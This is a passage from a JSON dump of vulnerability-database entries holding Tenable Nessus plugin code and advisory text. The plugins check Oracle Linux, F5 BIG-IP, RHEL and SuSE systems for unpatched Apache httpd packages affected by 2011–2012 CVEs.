value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:47:42", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-05T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache HTTP server vulnerabilities (SOL15889)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-03-10T00:00:00", "cpe": 
["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15889.NASL", "href": "https://www.tenable.com/plugins/nessus/79733", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15889.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79733);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50802, 51705);\n\n script_name(english:\"F5 Networks BIG-IP : Apache HTTP server vulnerabilities (SOL15889)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15889\"\n );\n script_set_attribute(\n attribute:\"solution\",\n 
value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15889.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15889\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = 
make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.0-11.4.1\",\"10.2.4HF12\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\",\"10.2.4HF12\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\",\"10.2.4HF12\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:37:48", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. 
An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-22T00:00:00", "type": "nessus", "title": "RHEL 5 : httpd (RHSA-2012:0323)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/nessus/58085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0323. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58085);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"RHEL 5 : httpd (RHSA-2012:0323)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security 
impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1392.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0323\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n\n if (flag)\n {\n 
security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:24", "description": "This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives. (CVE-2011-3639 / CVE-2011-3368 / CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a heap-based buffer overflow could potentially allow local attackers to gain privileges. (CVE-2011-3607)", "cvss3": {"score": null, "vector": null}, "published": "2011-12-14T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Apache2 (ZYPP Patch Number 7882)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1473", "CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-7882.NASL", "href": "https://www.tenable.com/plugins/nessus/57298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57298);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1473\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\");\n\n script_name(english:\"SuSE 10 Security Update : Apache2 (ZYPP Patch 
Number 7882)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy\n reverse exposure via RewriteRule or ProxyPassMatch\n directives. (CVE-2011-3639 / CVE-2011-3368 /\n CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling\n renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a\n heap-based buffer overflow could potentially allow local\n attackers to gain privileges. (CVE-2011-3607)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1473.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3607.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7882.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-devel-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-doc-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-example-pages-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-prefork-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-worker-2.2.3-16.42.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host 
is not affected.\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-27T14:50:52", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. (CVE-2011-3607)\n\n - The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n (CVE-2011-4317)\n\n - scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function. (CVE-2012-0031)\n\n - protocol.c in the 